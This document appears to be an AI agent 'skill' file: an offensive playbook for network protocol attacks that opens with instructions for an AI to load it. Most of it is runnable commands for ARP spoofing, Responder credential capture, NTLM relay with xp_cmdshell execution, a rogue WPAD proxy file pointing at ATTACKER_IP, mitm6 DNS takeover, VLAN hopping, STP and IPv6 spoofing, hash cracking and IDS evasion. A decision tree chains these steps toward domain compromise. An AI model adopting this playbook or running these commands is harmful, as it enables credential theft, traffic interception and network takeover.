SKILL: Network Protocol Attacks — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.

0. RELATED ROUTING

Before going deep, consider loading:

tunneling-and-pivoting after establishing MitM position for traffic redirection
ntlm-relay-coercion for relaying captured NTLM hashes from poisoning attacks
unauthorized-access-common-services for exploiting services discovered during network attacks
traffic-analysis-pcap for analyzing captured traffic from MitM

Advanced Reference

Also load NAME_RESOLUTION_POISONING.md when you need:

Detailed Responder/mitm6 configuration and workflows
NTLM relay target selection and chaining
Credential format analysis and cracking priorities

1. ARP SPOOFING

Gratuitous ARP — MitM Positioning

# arpspoof (dsniff suite)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

# ettercap — ARP poisoning with sniffing
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//

# bettercap — modern framework
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on

Selective Targeting

# bettercap — target specific hosts, avoid detection
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on

Detection Indicators

Duplicate MAC addresses in ARP table
Gratuitous ARP storms from non-gateway IPs
Tools: arpwatch, static ARP entries, 802.1X port authentication

2. LLMNR / NBT-NS / mDNS POISONING

Responder — Credential Capture

# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv

# Key flags:
# -d  Enable answers for DHCP broadcast requests (fingerprinting)
# -w  Start WPAD rogue proxy
# -P  Force NTLM auth for WPAD
# -v  Verbose

# Analyze mode only (passive, no poisoning)
responder -I eth0 -A

Captured Hash Formats

Protocol	Hash Type	Hashcat Mode	Crackability
NTLMv1	NetNTLMv1	5500	Fast — rainbow tables viable
NTLMv2	NetNTLMv2	5600	Moderate — dictionary + rules
NTLMv1-ESS	NetNTLMv1	5500	Fast — same as NTLMv1

# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt

Relay Instead of Crack

# ntlmrelayx — relay captured NTLM to other services
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access    # RBCD attack
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"

3. WPAD ABUSE

# Responder with WPAD proxy
responder -I eth0 -wPv

# WPAD flow:
# 1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS
# 2. Responder answers with rogue wpad.dat
# 3. Browser uses attacker's proxy → forced NTLM auth → credential capture

Manual WPAD PAC File

// Rogue wpad.dat content
function FindProxyForURL(url, host) {
    return "PROXY ATTACKER_IP:3128; DIRECT";
}

4. DHCPv6 ATTACK — mitm6

Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.

# mitm6 → DNS takeover → NTLM relay
mitm6 -d domain.com

# In parallel: relay captured NTLM to LDAP(S) for delegation
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access

# Attack chain:
# 1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS
# 2. Victim DNS queries go to attacker → WPAD redirect
# 3. Forced NTLM auth → relay to LDAP → create machine account or RBCD

Key Conditions

SMB signing disabled on targets (for SMB relay)
LDAP signing not enforced on DC (for LDAP relay)
Domain Computers quota > 0 (for machine account creation, default: 10)

5. VLAN HOPPING

Switch Spoofing (DTP)

# yersinia — DTP attack to negotiate trunk
yersinia dtp -attack 1 -interface eth0

# frogger.sh — automated VLAN hopping via DTP
./frogger.sh
# Sends DTP frames → switch enables trunking → access all VLANs

# After trunk established:
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up

Double Tagging (802.1Q)

# Craft double-tagged frame: outer=native VLAN, inner=target VLAN
# scapy:
from scapy.all import *
pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")

# Limitation: one-way only (responses go to real gateway)
# Effective for blind attacks (e.g., targeting a server)

Mitigation

Disable DTP: switchport nonegotiate
Set native VLAN to unused: switchport trunk native vlan 999
Prune VLANs: only allow needed VLANs on trunk ports

6. STP MANIPULATION

Root Bridge Claim

# yersinia — claim root bridge with lowest priority
yersinia stp -attack 4 -interface eth0

# Send BPDUs with priority 0 → become root bridge
# All traffic flows through attacker → MitM

Topology Change Attack

# Send TC (Topology Change) BPDUs → force MAC table flush
yersinia stp -attack 1 -interface eth0
# Switches flood all ports temporarily → sniff traffic

Mitigation

BPDU Guard on access ports
Root Guard on designated ports
spanning-tree portfast bpduguard enable

7. DNS SPOOFING

DNS Cache Poisoning

# bettercap DNS spoofing
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on

# ettercap DNS spoofing (via etter.dns config)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//

Kaminsky Attack Variant

Flood recursive resolver with forged responses for random subdomains, each including a malicious authority section pointing the NS record to attacker-controlled server.

8. IPv6 ATTACKS

Router Advertisement Spoofing

# Send rogue RA → victim configures attacker as default gateway
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64

# THC-IPv6 suite for comprehensive IPv6 attacks
atk6-parasite6 eth0     # ICMPv6 neighbor spoofing
atk6-redir6 eth0 ...    # Traffic redirection via ICMPv6 redirect

SLAAC Abuse

# Advertise rogue prefix → victim auto-configures IPv6 address
# Combined with rogue DNS (RA option) → full MitM over IPv6
# Windows prioritizes IPv6 over IPv4 by default

9. IDS/IPS EVASION

Technique	Method	Tool/Flag
IP Fragmentation	Split payload across fragments	`nmap -f`, `fragroute`
TTL Manipulation	Set TTL to expire at IDS but reach target	`fragroute`
Encoding Evasion	URL/Unicode/hex encoding	Manual, custom scripts
Session Splicing	Split TCP payload across segments	`fragroute`, `nmap --data-length`
Timing-Based	Slow scan to avoid rate-based detection	`nmap -T0`, `nmap -T1`
Decoy Scanning	Mix real scan with decoy source IPs	`nmap -D RND:10`
Idle/Zombie Scan	Use idle host as scan proxy	`nmap -sI ZOMBIE_IP`

# fragroute — fragment and reorder packets
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP

# nmap evasion combinations
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET

10. DECISION TREE

Network access obtained — want to escalate via network attacks
│
├── On same broadcast domain as targets?
│   ├── YES → ARP spoof for MitM (§1)
│   │   └── Capture plaintext creds or redirect traffic
│   └── NO → need VLAN hopping first (§5)
│       ├── DTP enabled? → switch spoofing
│       └── Know native VLAN? → double tagging
│
├── Windows environment?
│   ├── LLMNR/NBT-NS enabled? (default YES)
│   │   └── Run Responder (§2) → capture NetNTLM hashes
│   │       ├── NTLMv1? → crack fast or relay
│   │       └── NTLMv2? → relay (§2) or crack with rules
│   │
│   ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│   │
│   └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│       └── LDAP relay → RBCD → domain compromise
│
├── Need DNS control?
│   ├── MitM already established? → DNS spoofing (§7)
│   └── DHCPv6 available? → mitm6 for DNS takeover (§4)
│
├── Managed switches with weak config?
│   ├── BPDU Guard off? → STP root bridge claim (§6)
│   └── DTP enabled? → VLAN hopping (§5)
│
├── IPv6 attack surface?
│   └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
│
└── IDS/IPS in path?
    └── Apply evasion techniques (§9) — fragmentation, timing, encoding

network-protocol-attacks

SKILL: Network Protocol Attacks — Expert Attack Playbook

0. RELATED ROUTING

Advanced Reference

1. ARP SPOOFING

Gratuitous ARP — MitM Positioning

Selective Targeting

Detection Indicators

2. LLMNR / NBT-NS / mDNS POISONING

Responder — Credential Capture

Captured Hash Formats

Relay Instead of Crack

3. WPAD ABUSE

Manual WPAD PAC File

4. DHCPv6 ATTACK — mitm6

Key Conditions

5. VLAN HOPPING

Switch Spoofing (DTP)

Double Tagging (802.1Q)

Mitigation

6. STP MANIPULATION

Root Bridge Claim

Topology Change Attack

Mitigation

7. DNS SPOOFING

DNS Cache Poisoning

Kaminsky Attack Variant

8. IPv6 ATTACKS

Router Advertisement Spoofing

SLAAC Abuse

9. IDS/IPS EVASION

10. DECISION TREE